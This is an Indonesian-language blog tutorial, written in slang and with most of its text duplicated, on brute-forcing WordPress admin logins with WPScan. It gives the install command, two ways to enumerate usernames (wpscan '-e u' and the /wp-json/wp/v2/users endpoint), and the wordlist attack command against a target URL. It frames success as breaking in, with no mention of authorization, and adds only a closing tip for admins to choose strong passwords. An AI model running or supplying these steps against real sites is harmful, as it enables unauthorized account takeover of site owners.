Hello welcome back
Kali ini gua mau buat tutorial kekmana caranya Brute Force WordPress
disini gua pake tools WPSCAN. buat yang pake OS Parrot Security ama Kali Linux gausah install lagi soalnya udah ada WPSCAN nya.
oke langsung aja gua kasi tau caranya
Langkah-langkah: anjg kek tutor masak:V
1.$ sudo apt install wpscan (buat yang belom ada)
2.$ wpscan --url http://url.com -e u (buat cari usernamenya)
atau bisa langsung cari di websitenya http://url.com/wp-json/wp/v2/users
3.$ wpscan --url http://url.com -U username -P /dir/pass.txt
( /dir/pass.txt itu sesuaikan sama lokasi wordlist kalian, bisa liat ss di bawah )
Oke sekian dulu tutorial dari gua moga aja bisa dipahami.
dan buat admin web kalo buat password jangan yang gampang. kalo bisa buat passwordnya pake kombinasi huruf kapital sama angka dll.
paypay
Kali ini gua mau buat tutorial kekmana caranya Brute Force WordPress
disini gua pake tools WPSCAN. buat yang pake OS Parrot Security ama Kali Linux gausah install lagi soalnya udah ada WPSCAN nya.
oke langsung aja gua kasi tau caranya
Langkah-langkah: anjg kek tutor masak:V
1.$ sudo apt install wpscan (buat yang belom ada)
2.$ wpscan --url http://url.com -e u (buat cari usernamenya)
atau bisa langsung cari di websitenya http://url.com/wp-json/wp/v2/users
3.$ wpscan --url http://url.com -U username -P /dir/pass.txt
( /dir/pass.txt itu sesuaikan sama lokasi wordlist kalian, bisa liat ss di bawah )
Tunggu sampe proses brutenya selesai dan BOOMM!! kena. kalo hoki bakal kena sih kalo gak ya sabar aja... :V
Oke sekian dulu tutorial dari gua moga aja bisa dipahami.
dan buat admin web kalo buat password jangan yang gampang. kalo bisa buat passwordnya pake kombinasi huruf kapital sama angka dll.
paypay
Komentar
Posting Komentar